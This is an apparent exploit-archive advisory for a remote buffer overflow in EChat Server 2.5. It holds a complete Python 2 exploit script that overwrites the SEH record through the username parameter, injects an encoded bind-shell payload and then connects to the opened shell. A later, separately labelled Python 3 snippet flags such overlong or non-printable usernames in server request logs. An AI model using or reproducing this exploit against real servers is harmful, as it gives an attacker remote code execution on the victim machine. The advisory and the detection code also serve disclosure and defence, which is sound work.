EChat Server 2.5 Buffer Overflow

Published 13 Aug 2011. Reported by Juan Sacco. Type: packetstorm. Source: packetstormsecurity.com. 18 views.

EChat Server 2.5 Remote Buffer Overflow Vulnerability

Code

Information
--------------------
Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>

Description
------------------

EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Exploit example as follows
-----------------------------

```python
#!/usr/bin/python
# Easy Chat Server <= v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: [email protected]
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3
# Python 2 script (httplib and print statements).

import sys
import httplib
import telnetlib


def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)


def run():
    try:
        # Basic structure: JUNK + NSEH + SEH + SHELLCODE
        Junk = '\x41' * 216        # 216 bytes of A, fills the buffer up to the SEH record
        nSEH = '\xEB\x06\x90\x90'  # JMP 6 bytes short, over the SEH address
        SEH = '\xE1\xB2\x01\x10'   # 0x1001b2e1 pop edi; pop esi; ret

        # ShellCode Bind TCP PORT 444 Length 751 Encode : Alpha Upper
        ShellCode = (
            "\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
            "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
            "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
            "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
            "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
            "\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
            "\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
            "\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
            "\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
            "\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
            "\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
            "\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
            "\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
            "\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
            "\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
            "\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
            "\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
            "\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
            "\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
            "\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
            "\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
            "\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
            "\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
            "\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
            "\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
            "\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
            "\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
            "\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
            "\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
            "\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
            "\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
            "\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
            "\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
            "\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
            "\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
            "\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
            "\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
            "\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
            "\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
            "\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
            "\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
            "\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
            "\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
            "\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
            "\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
            "\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
            "\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
            "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
            "\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
            "\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
            "\x41")
        ShellCodePort = 4444
        CraftedBuffer = Junk + nSEH + SEH + ShellCode
        # The whole buffer travels in the unchecked username parameter
        vulnerableURL = ('/chat.ghp?username=' + CraftedBuffer +
                         '&password=null&room=1&null=2')

        Connection = httplib.HTTPConnection(Host, Port)
        Connection.request('GET', vulnerableURL)
        Connection.close()

        print "Connecting to " + Host
        TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
        TelnetConnection.interact()

    except:
        print "Exploit connection closed"


if __name__ == '__main__':
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"

    try:
        Host = sys.argv[1]
        Port = int(sys.argv[2])
    except IndexError:
        howtousage()
    run()
```

Author
-------------------
Juan Sacco (Runlvl) - http://www.insecurityresearch.com

--
_________________________________________________
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released, stay tuned
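As an added defensive example (not part of the advisory or Juan Sacco's code), the following Python 3 check parses web-server request lines for the /chat.ghp login used above and flags username values that look like the JUNK + NSEH + SEH + SHELLCODE layout rather than a name. The length limits and the sample request lines are assumptions, since the vendor's buffer size is not published.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Assumed limits: the vendor's buffer size is not published, but the advisory shows
# 216 bytes of padding reaching the SEH record, so real usernames are far shorter.
MAX_USERNAME_LEN = 64   # longer than this is treated as an overflow attempt
MAX_REPEAT_RUN = 32     # one byte repeated this often is padding, not a name


def username_from_request(request_line):
    """Percent-decoded username bytes of a 'GET /chat.ghp?...' line, else None."""
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0] != "GET":
        return None
    url = urlsplit(parts[1])
    if url.path != "/chat.ghp":
        return None
    for pair in url.query.split("&"):
        key, _, value = pair.partition("=")
        if key == "username":
            return unquote_to_bytes(value)  # keep raw bytes so \xEB etc. survive
    return None


def assess_request(request_line):
    """Return (suspicious, reasons): three independent signs of the advisory's
    JUNK + NSEH + SEH + SHELLCODE layout where a short username belongs."""
    name = username_from_request(request_line)
    if name is None:
        return False, []      # not a chat.ghp login, never flagged
    reasons = []
    if len(name) > MAX_USERNAME_LEN:
        reasons.append("username length %d exceeds %d" % (len(name), MAX_USERNAME_LEN))
    runs = (len(m.group(0)) for m in re.finditer(rb"(.)\1*", name, re.S))
    longest = max(runs, default=0)
    if longest > MAX_REPEAT_RUN:
        reasons.append("run of %d identical bytes (overflow padding)" % longest)
    if any(b < 0x20 or b > 0x7E for b in name):
        reasons.append("non-printable bytes in username (addresses/opcodes)")
    return bool(reasons), reasons


# Constructed sample request lines, not taken from real logs.
BENIGN = "GET /chat.ghp?username=alice&password=null&room=1&null=2 HTTP/1.1"
# Same layout as the advisory's buffer: 216 x 'A', then the 4-byte nSEH and SEH values.
EXPLOIT_LIKE = ("GET /chat.ghp?username=" + "A" * 216 + "%EB%06%90%90%E1%B2%01%10"
                + "&password=null&room=1&null=2 HTTP/1.1")

if __name__ == "__main__":
    for line in (BENIGN, EXPLOIT_LIKE):
        print(assess_request(line))
```

The same three checks apply to any other query parameter the server copies into a fixed buffer; only the path and key need changing.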


Vulners AI Score: 0.5 (Low risk)